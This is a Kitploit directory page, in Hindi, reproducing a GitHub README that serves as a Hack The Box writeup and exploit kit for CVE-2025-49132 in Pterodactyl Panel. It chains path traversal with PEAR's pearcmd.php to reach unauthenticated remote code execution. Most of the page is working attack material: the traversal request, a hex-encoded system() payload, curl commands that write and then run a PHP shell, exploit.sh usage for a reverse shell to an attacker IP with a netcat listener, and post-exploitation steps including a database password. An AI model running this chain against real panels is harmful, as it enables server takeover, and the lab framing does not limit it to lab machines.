Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-49132_HTB_SEASON10 — CVE-2025-49132 के लिए शोषण जो Pterodactyl Panel को लक्षित करता है, अनधिकृत रिमोट कोड निष्पादन के लिए पथ ट्रैवर्सल को PEAR कमांड इंजेक्शन के साथ जोड़ता है। इसमें कमांड निष्पादन, रिवर्स शेल्स, और विशेषाधिकार वृद्धि मार्गदर्शन के लिए bash और Python स्क्रिप्ट शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/nik123-py/cve-2025-49132_htb_season10
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnik123-py/cve-2025-49132_htb_season10

CVE-2025-49132_HTB_SEASON10

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-49132 के लिए शोषण जो Pterodactyl Panel को लक्षित करता है, अनधिकृत रिमोट कोड निष्पादन के लिए पथ ट्रैवर्सल को PEAR कमांड इंजेक्शन के साथ जोड़ता है। इसमें कमांड निष्पादन, रिवर्स शेल्स, और विशेषाधिकार वृद्धि मार्गदर्शन के लिए bash और Python स्क्रिप्ट शामिल हैं।

रिपॉजिटरी देखें
16 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-49132 - Pterodactyl Panel RCE शोषण

HTB सीज़न 10 - Pterodactyl Machine राइटअप

अवलोकन

लक्ष्य: Pterodactyl HTB Machine (मध्यम कठिनाई)
CVE: CVE-2025-49132
गंभीरता: क्रिटिकल (CVSS 9.8)
हमले का प्रकार: अप्रमाणित दूरस्थ कोड निष्पादन
प्रभावित: Pterodactyl Panel < v1.11.11

यह शोषण श्रृंखला निम्नलिखित को जोड़ती है:

  1. पथ ट्रैवर्सल स्थानीय अनुवाद प्रणाली में
  2. PEAR कमांड इंजेक्शन pearcmd.php के माध्यम से
  3. PHP कोड निष्पादन फ़ाइल लेखन + शामिल करने के माध्यम से

बग

Pterodactyl Panel का /locales/locale.json एंडपॉइंट locale पैरामीटर के माध्यम से पथ ट्रैवर्सल की अनुमति देता है:

root@kitploit:~
GET /locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd

इसे PEAR के pearcmd.php के साथ जोड़ा जा सकता है:

  1. /tmp में मनमानी PHP फ़ाइलें लिखना
  2. उन्हें दूसरे अनुरोध के माध्यम से निष्पादित करना

यह क्यों काम करता है

PEAR (PHP एक्सटेंशन और एप्लिकेशन रिपॉजिटरी) में एक CLI उपकरण (pearcmd.php) है जो:

  • URL पैरामीटर के माध्यम से कमांड स्वीकार करता है (केवल CLI के लिए अभिप्रेत)
  • एक config-create कमांड है जो फ़ाइलें लिखता है
  • जब वेब के माध्यम से कॉल किया जाता है तो कोई प्रमाणीकरण नहीं है

शोषण श्रृंखला:

root@kitploit:~
पथ ट्रैवर्सल → pearcmd.php लोड करें → config-create के माध्यम से PHP इंजेक्ट करें → दुर्भावनापूर्ण PHP निष्पादित करें

Hex2bin() ट्रिक

कमांड hex2bin() का उपयोग करके हेक्स-एन्कोडेड होते हैं ताकि बाईपास किया जा सके:

  • URL एन्कोडिंग समस्याएं
  • विशेष वर्ण फ़िल्टर
  • Nginx/PHP पार्सिंग समस्याएं

उदाहरण:

root@kitploit:~
कमांड: whoami
हेक्स:     77686f616d69
पेलोड: <?=system(hex2bin('77686f616d69'))?>

दूरस्थ कोड निष्पादन (RCE)

विधि 1: प्रदान किए गए exploit.sh का उपयोग करना

root@kitploit:~
chmod +x exploit.sh

# उपयोगकर्ता फ्लैग प्राप्त करें
./exploit.sh flag

# कमांड निष्पादित करें
./exploit.sh cmd "whoami"
./exploit.sh cmd "cat /etc/passwd"

# रिवर्स शेल
nc -lvnp 4444  # हमलावर मशीन पर
./exploit.sh shell 10.10.14.21 4444

विधि 2: मैन्युअल शोषण

root@kitploit:~
# चरण 1: PHP शेल लिखें (हेक्स-एन्कोडेड "whoami")
curl -g "http://panel.pterodactyl.htb/locales/locale.json?\
+config-create+/&\
locale=../../../../../../usr/share/php/PEAR&\
namespace=pearcmd&\
/<?=system(hex2bin('77686f616d69'))?>+/tmp/shell.php"

# चरण 2: निष्पादित करें
curl "http://panel.pterodactyl.htb/locales/locale.json?\
locale=../../../../../tmp&\
namespace=shell"

विधि 3: Python स्क्रिप्ट

root@kitploit:~
मैंने exploit.py जोड़ा
**requests इंस्टॉल करें**

🛠️ प्रदान किए गए उपकरण

1. exploit.sh (अनुशंसित)

पूर्ण-सुविधा युक्त bash शोषण

root@kitploit:~
./exploit.sh cmd "whoami"           # एकल कमांड निष्पादित करें
./exploit.sh shell 10.10.14.21 4444 # रिवर्स शेल
./exploit.sh flag                   # उपयोगकर्ता फ्लैग खोजें

विशेषताएं:

  • विश्वसनीयता के लिए Hex2bin() एन्कोडिंग
  • Python-आधारित आउटपुट फ़िल्टरिंग
  • एकाधिक शेल विधियाँ (bash TCP + mkfifo)
  • साफ़, पार्स किया गया आउटपुट

2. CVE-2025-49132_DETAILED.txt

विस्तृत तकनीकी दस्तावेज़ीकरण

इसमें शामिल है:

  • कमजोरी का गहन विवरण
  • PEAR आर्किटेक्चर स्पष्टीकरण
  • चरण-दर-चरण शोषण विवरण
  • समस्या निवारण मार्गदर्शिका
  • पहचान विधियाँ (IOCs)
  • शमन रणनीतियाँ

त्वरित प्रारंभ

root@kitploit:~
# 1. /etc/hosts में जोड़ें
echo "10.10.x.x pterodactyl.htb panel.pterodactyl.htb" | sudo tee -a /etc/hosts

# 2. शोषण डाउनलोड करें
wget https://your-repo/exploit.sh
chmod +x exploit.sh

# 3. शेल प्राप्त करें
nc -lvnp 4444  # टर्मिनल 1
./exploit.sh shell 10.10.14.21 4444  # टर्मिनल 2

# 4. उपयोगकर्ता फ्लैग प्राप्त करें
cat /home/phileasfogg3/user.txt

विशेषाधिकार वृद्धि

गणना

root@kitploit:~
# चल रही सेवाओं की जाँच करें
ss -tlnp

# मिला:
# 127.0.0.1:3306 - MySQL (रूट)
# 127.0.0.1:6379 - Redis
# 127.0.0.1:9000 - PHP-FPM (रूट)
# 127.0.0.1:25   - Postfix

# sudo जाँचें
sudo -l
# (संभवतः पासवर्ड आवश्यक)

# SUID बाइनरी
find / -perm -4000 2>/dev/null

# क्रॉन जॉब
cat /etc/crontab
ls -la /etc/cron.*

सामान्य PrivEsc वैक्टर

  1. ज्ञात क्रेडेंशियल्स के साथ MySQL
root@kitploit:~
mysql -u pterodactyl -pPteraPanel
# UDF इंजेक्शन, फ़ाइल लेखन अनुमतियों की जाँच करें
  1. रूट के रूप में चल रहा PHP-FPM
root@kitploit:~
# FPM शोषण की जाँच करें (CVE-2019-11043 या कॉन्फ़िगरेशन दुरुपयोग)
  1. Redis शोषण
root@kitploit:~
# प्रमाणीकरण बाईपास, cron के माध्यम से RCE की जाँच करें
redis-cli -h 127.0.0.1
  1. क्रॉन में लिखने योग्य स्क्रिप्ट की जाँच करें
root@kitploit:~
find /etc/cron* -writable 2>/dev/null
  1. कर्नेल शोषण (अंतिम उपाय)
root@kitploit:~
uname -a
# DirtyCow आदि की जाँच करें

संदर्भ

CVE और शोषण

  • NVD - CVE-2025-49132
  • OpenCVE - CVE-2025-49132

तकनीकी संसाधन

  • Pterodactyl Panel Docs
  • PEAR Documentation
  • OWASP Path Traversal

टूल डाउनलोड करें